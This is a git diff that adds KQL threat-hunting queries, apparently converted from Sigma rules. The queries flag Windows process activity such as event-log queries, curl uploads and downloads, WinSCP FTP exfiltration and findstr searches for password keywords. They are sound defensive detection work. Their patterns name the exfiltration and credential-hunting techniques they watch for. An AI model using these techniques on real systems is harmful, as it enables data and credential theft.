+// Title: EventLog Query Requests By Builtin Utilities
+// Author: Ali Alwashali, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-20
+// Level: medium
+// Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1552, attack.credential-access, detection.threat-hunting
+// False Positives:
+//   - Legitimate log access by administrators or troubleshooting tools
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/execution_from_webserver_root_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/execution_from_webserver_root_folder.kql
new file mode 100644
index 00000000..4f9ab5da
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/execution_from_webserver_root_folder.kql
@@ -0,0 +1,13 @@
+// Title: Execution From Webserver Root Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003, detection.threat-hunting
+// False Positives:
+//   - Various applications
+//   - Tools that include ping or nslookup command invocations
+
+DeviceProcessEvents
+| where (FolderPath contains "\\wwwroot\\" or FolderPath contains "\\wmpub\\" or FolderPath contains "\\htdocs\\") and (not(((FolderPath contains "bin\\" or FolderPath contains "\\Tools\\" or FolderPath contains "\\SMSComponent\\") and InitiatingProcessFolderPath endswith "\\services.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/file_download_via_curl_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/file_download_via_curl_exe.kql
new file mode 100644
index 00000000..fdba60b6
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/file_download_via_curl_exe.kql
@@ -0,0 +1,14 @@
+// Title: File Download Via Curl.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-05
+// Level: medium
+// Description: Detects file download using curl.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
+// False Positives:
+//   - Scripts created by developers and admins
+//   - Administrative activity
+//   - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt "
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/file_or_folder_permissions_modifications.kql b/KQL/rules-threat-hunting/windows/process_creation/file_or_folder_permissions_modifications.kql
new file mode 100644
index 00000000..ebe4e593
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/file_or_folder_permissions_modifications.kql
@@ -0,0 +1,13 @@
+// Title: File or Folder Permissions Modifications
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-23
+// Level: medium
+// Description: Detects a file or folder's permissions being modified or tampered with.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.001, detection.threat-hunting
+// False Positives:
+//   - Users interacting with the files on their own (unlikely unless privileged users).
+//   - Dynatrace app
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "/grant" or ProcessCommandLine contains "/setowner" or ProcessCommandLine contains "/inheritance:r") and (FolderPath endswith "\\cacls.exe" or FolderPath endswith "\\icacls.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "-r" and FolderPath endswith "\\attrib.exe") or FolderPath endswith "\\takeown.exe") and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\Avira" or ProcessCommandLine contains ":\\Program Files\\Avira") or ProcessCommandLine endswith "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\connectivity.history /reset" or (ProcessCommandLine contains "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\config.properties /grant :r " and ProcessCommandLine contains "S-1-5-19:F") or (ProcessCommandLine contains "\\AppData\\Local\\Programs\\Microsoft VS Code" or ProcessCommandLine contains ":\\Program Files\\Microsoft VS Code"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/ftp_connection_open_attempt_via_winscp_cli.kql b/KQL/rules-threat-hunting/windows/process_creation/ftp_connection_open_attempt_via_winscp_cli.kql
new file mode 100644
index 00000000..241dcbd5
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/ftp_connection_open_attempt_via_winscp_cli.kql
@@ -0,0 +1,10 @@
+// Title: FTP Connection Open Attempt Via Winscp CLI
+// Author: frack113
+// Date: 2025-10-12
+// Level: medium
+// Description: Detects the execution of Winscp with the "-command" and the "open" flags in order to open an FTP connection. Akira ransomware was seen using this technique in order to exfiltrate data.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "open " and ProcessCommandLine contains "ftp://") and (ProcessCommandLine contains "-command" or ProcessCommandLine contains "/command" or ProcessCommandLine contains "–command" or ProcessCommandLine contains "—command" or ProcessCommandLine contains "―command")) and (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/headless_process_launched_via_conhost_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/headless_process_launched_via_conhost_exe.kql
new file mode 100644
index 00000000..63deac6a
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/headless_process_launched_via_conhost_exe.kql
@@ -0,0 +1,11 @@
+// Title: Headless Process Launched Via Conhost.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag.
+// The "--headless" flag hides the windows from the user upon execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, detection.threat-hunting
+
+DeviceProcessEvents
+| where InitiatingProcessCommandLine contains "--headless" and InitiatingProcessFolderPath endswith "\\conhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql
new file mode 100644
index 00000000..ab8db468
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql
@@ -0,0 +1,15 @@
+// Title: HTML File Opened From Download Folder
+// Author: Joseph Kamau
+// Date: 2025-12-05
+// Level: low
+// Description: Detects web browser process opening an HTML file from a user's Downloads folder.
+// This behavior is could be associated with phishing attacks where threat actors send HTML attachments to users.
+// When a user opens such an attachment, it can lead to the execution of malicious scripts or the download of malware.
+// During investigation, analyze the HTML file for embedded scripts or links, check for any subsequent downloads or process executions, and investigate the source of the email or message containing the attachment.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1598.002, attack.t1566.001, attack.initial-access, attack.reconnaissance, detection.threat-hunting
+// False Positives:
+//   - Opening any HTML file located in users directories via a browser process will trigger this.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\users\\" and ProcessCommandLine contains "\\Downloads\\" and ProcessCommandLine contains ".htm") and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/import_new_module_via_powershell_commandline.kql b/KQL/rules-threat-hunting/windows/process_creation/import_new_module_via_powershell_commandline.kql
new file mode 100644
index 00000000..6d851d21
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/import_new_module_via_powershell_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Import New Module Via PowerShell CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: low
+// Description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+//   - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not(((ProcessCommandLine contains ":\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "Tools\\Microsoft.VisualStudio.DevShell.dll") and (InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\cmd.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/windows/process_creation/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
new file mode 100644
index 00000000..56f403c9
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
@@ -0,0 +1,14 @@
+// Title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-12-01
+// Level: medium
+// Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace.
+// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
+// These can be used for example in decrypting malicious payload for defense evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1027.010, detection.threat-hunting
+// False Positives:
+//   - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".AesCryptoServiceProvider" or ProcessCommandLine contains ".DESCryptoServiceProvider" or ProcessCommandLine contains ".DSACryptoServiceProvider" or ProcessCommandLine contains ".RC2CryptoServiceProvider" or ProcessCommandLine contains ".Rijndael" or ProcessCommandLine contains ".RSACryptoServiceProvider" or ProcessCommandLine contains ".TripleDESCryptoServiceProvider") and ProcessCommandLine contains "System.Security.Cryptography." and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/manual_execution_of_script_inside_of_a_compressed_file.kql b/KQL/rules-threat-hunting/windows/process_creation/manual_execution_of_script_inside_of_a_compressed_file.kql
new file mode 100644
index 00000000..01966444
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/manual_execution_of_script_inside_of_a_compressed_file.kql
@@ -0,0 +1,17 @@
+// Title: Manual Execution of Script Inside of a Compressed File
+// Author: @kostastsale
+// Date: 2023-02-15
+// Level: medium
+// Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries.
+// From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios.
+//     1. Compressed file opened using 7zip.
+//     2. Compressed file opened using WinRar.
+//     3. Compressed file opened using native windows File Explorer capabilities.
+// When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter."
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.threat-hunting
+// False Positives:
+//   - Batch files may produce a lot of noise, as many applications appear to bundle them as part of their installation process. You should baseline your environment and generate a new query excluding the noisy and expected activity. Some false positives may come up depending on your environment. All results should be investigated thoroughly before filtering out results.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine =~ "*\\AppData\\local\\temp\\7z*\*" and InitiatingProcessFolderPath =~ "*\\7z*.exe") or ((ProcessCommandLine contains "\\AppData\\local\\temp*.rar\\" or ProcessCommandLine contains "\\AppData\\local\\temp*.zip\\") and InitiatingProcessFolderPath endswith "\\explorer.exe") or (ProcessCommandLine =~ "*\\AppData\\local\\temp\\rar*\*" and InitiatingProcessFolderPath endswith "\\winrar.exe")) and ((ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".js" or ProcessCommandLine endswith ".jse" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".wsf" or ProcessCommandLine endswith ".wsh") and (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/microsoft_workflow_compiler_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/microsoft_workflow_compiler_execution.kql
new file mode 100644
index 00000000..6b91719e
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/microsoft_workflow_compiler_execution.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Workflow Compiler Execution
+// Author: Nik Seetharaman, frack113
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1218, detection.threat-hunting
+// False Positives:
+//   - Legitimate MWC use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/net_exe_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/net_exe_execution.kql
new file mode 100644
index 00000000..47ec7162
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/net_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: Net.EXE Execution
+// Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)
+// Date: 2019-01-16
+// Level: low
+// Description: Detects execution of "Net.EXE".
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007, attack.t1049, attack.t1018, attack.t1135, attack.t1201, attack.t1069.001, attack.t1069.002, attack.t1087.001, attack.t1087.002, attack.lateral-movement, attack.t1021.002, attack.s0039, detection.threat-hunting
+// False Positives:
+//   - Likely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " accounts" or ProcessCommandLine contains " group" or ProcessCommandLine contains " localgroup" or ProcessCommandLine contains " share" or ProcessCommandLine contains " start" or ProcessCommandLine contains " stop " or ProcessCommandLine contains " user" or ProcessCommandLine contains " view") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/new_self_extracting_package_created_via_iexpress_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/new_self_extracting_package_created_via_iexpress_exe.kql
new file mode 100644
index 00000000..5b0f2baa
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/new_self_extracting_package_created_via_iexpress_exe.kql
@@ -0,0 +1,14 @@
+// Title: New Self Extracting Package Created Via IExpress.EXE
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-02-05
+// Level: medium
+// Description: Detects the "iexpress.exe" utility creating self-extracting packages.
+// Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files.
+// Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+// False Positives:
+//   - Administrators building packages using iexpress.exe
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\makecab.exe" or ProcessVersionInfoOriginalFileName =~ "makecab.exe") and InitiatingProcessFolderPath endswith "\\iexpress.exe") or (ProcessCommandLine contains " /n " and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql b/KQL/rules-threat-hunting/windows/process_creation/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
new file mode 100644
index 00000000..0e74803a
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet
+// Author: frack113
+// Date: 2024-05-03
+// Level: low
+// Description: Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004, detection.threat-hunting
+// False Positives:
+//   - Administrator script
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "New-NetFirewallRule " and ProcessCommandLine contains " -Action " and ProcessCommandLine contains "allow") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/password_protected_compressed_file_extraction_via_7zip.kql b/KQL/rules-threat-hunting/windows/process_creation/password_protected_compressed_file_extraction_via_7zip.kql
new file mode 100644
index 00000000..1d68187a
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/password_protected_compressed_file_extraction_via_7zip.kql
@@ -0,0 +1,12 @@
+// Title: Password Protected Compressed File Extraction Via 7Zip
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-10
+// Level: low
+// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001, detection.threat-hunting
+// False Positives:
+//   - Legitimate activity is expected since extracting files with a password can be common in some environment.
+
+DeviceProcessEvents
+| where (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and (ProcessCommandLine contains " -p" and ProcessCommandLine contains " x " and ProcessCommandLine contains " -o")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_boinc_software_execution_uc_berkeley_signature_.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_boinc_software_execution_uc_berkeley_signature_.kql
new file mode 100644
index 00000000..90bda73f
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_boinc_software_execution_uc_berkeley_signature_.kql
@@ -0,0 +1,13 @@
+// Title: Potential BOINC Software Execution (UC-Berkeley Signature)
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: informational
+// Description: Detects the use of software that is related to the University of California, Berkeley via metadata information.
+// This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1553, detection.threat-hunting
+// False Positives:
+//   - This software can be used for legitimate purposes when installed intentionally.
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "University of California, Berkeley"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters.kql
new file mode 100644
index 00000000..fc420363
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters.kql
@@ -0,0 +1,11 @@
+// Title: Potential CommandLine Obfuscation Using Unicode Characters
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-01-15
+// Level: medium
+// Description: Detects potential CommandLine obfuscation using unicode characters.
+// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_data_exfiltration_via_curl_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_data_exfiltration_via_curl_exe.kql
new file mode 100644
index 00000000..817fd51c
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_data_exfiltration_via_curl_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Data Exfiltration Via Curl.EXE
+// Author: Florian Roth (Nextron Systems), Cedric MAURUGEON (Update)
+// Date: 2020-07-03
+// Level: medium
+// Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105, detection.threat-hunting
+// False Positives:
+//   - Scripts created by developers and admins
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable")) and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_dll_sideloading_activity_via_extexport_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_dll_sideloading_activity_via_extexport_exe.kql
new file mode 100644
index 00000000..674acdb8
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_dll_sideloading_activity_via_extexport_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Activity Via ExtExport.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-26
+// Level: medium
+// Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa.
+// It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll".
+// Arbitrary DLLs can also be loaded if a specific number of flags was provided.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Extexport.exe" or ProcessVersionInfoOriginalFileName =~ "extexport.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_file_override_append_via_set_command.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_file_override_append_via_set_command.kql
new file mode 100644
index 00000000..96fa9c98
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_file_override_append_via_set_command.kql
@@ -0,0 +1,15 @@
+// Title: Potential File Override/Append Via SET Command
+// Author: Nasreddine Bencherchali (Nextron Systems), MahirAli Khan (in/mahiralikhan)
+// Date: 2024-08-22
+// Level: low
+// Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign.
+// Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly.
+// Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt".
+// The typical use case of the "set /p=" command is to prompt the user for input.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+//   - Legitimate use of the SET with the "/p" flag for user prompting. command in administrative scripts or user-generated scripts.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/c set /p=" or ProcessCommandLine contains "\"set /p=" or (ProcessCommandLine contains ">>" and ProcessCommandLine contains "set /p=")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_password_reconnaissance_via_findstr_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_password_reconnaissance_via_findstr_exe.kql
new file mode 100644
index 00000000..da9ac05f
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_password_reconnaissance_via_findstr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Password Reconnaissance Via Findstr.EXE
+// Author: Josh Nickels
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "contraseña" or ProcessCommandLine contains "hasło" or ProcessCommandLine contains "heslo" or ProcessCommandLine contains "parola" or ProcessCommandLine contains "passe" or ProcessCommandLine contains "passw" or ProcessCommandLine contains "senha" or ProcessCommandLine contains "senord" or ProcessCommandLine contains "密碼") and (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_proxy_execution_via_explorer_exe_from_shell_process.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
new file mode 100644
index 00000000..c7b2aa51
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
@@ -0,0 +1,15 @@
+// Title: Potential Proxy Execution Via Explorer.EXE From Shell Process
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
+// Date: 2020-10-05
+// Level: low
+// Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe".
+// Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter.
+// While this is often a legitimate action, this rule can be use to hunt for anomalies.
+// Muddy Waters threat actor was seeing using this technique.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+// False Positives:
+//   - Legitimate explorer.exe run from a shell host like "cmd.exe" or "powershell.exe"
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "explorer.exe" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_suspicious_execution_from_guid_like_folder_names.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_suspicious_execution_from_guid_like_folder_names.kql
new file mode 100644
index 00000000..f05c72fa
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_suspicious_execution_from_guid_like_folder_names.kql
@@ -0,0 +1,13 @@
+// Title: Potential Suspicious Execution From GUID Like Folder Names
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: low
+// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks.
+// Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting
+// False Positives:
+//   - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and (ProcessCommandLine contains "\\{" and ProcessCommandLine contains "}\\")) and (not((FolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or (FolderPath contains "\\{" and FolderPath contains "}\\") or (FolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_compression_tool_parameters.kql b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_compression_tool_parameters.kql
new file mode 100644
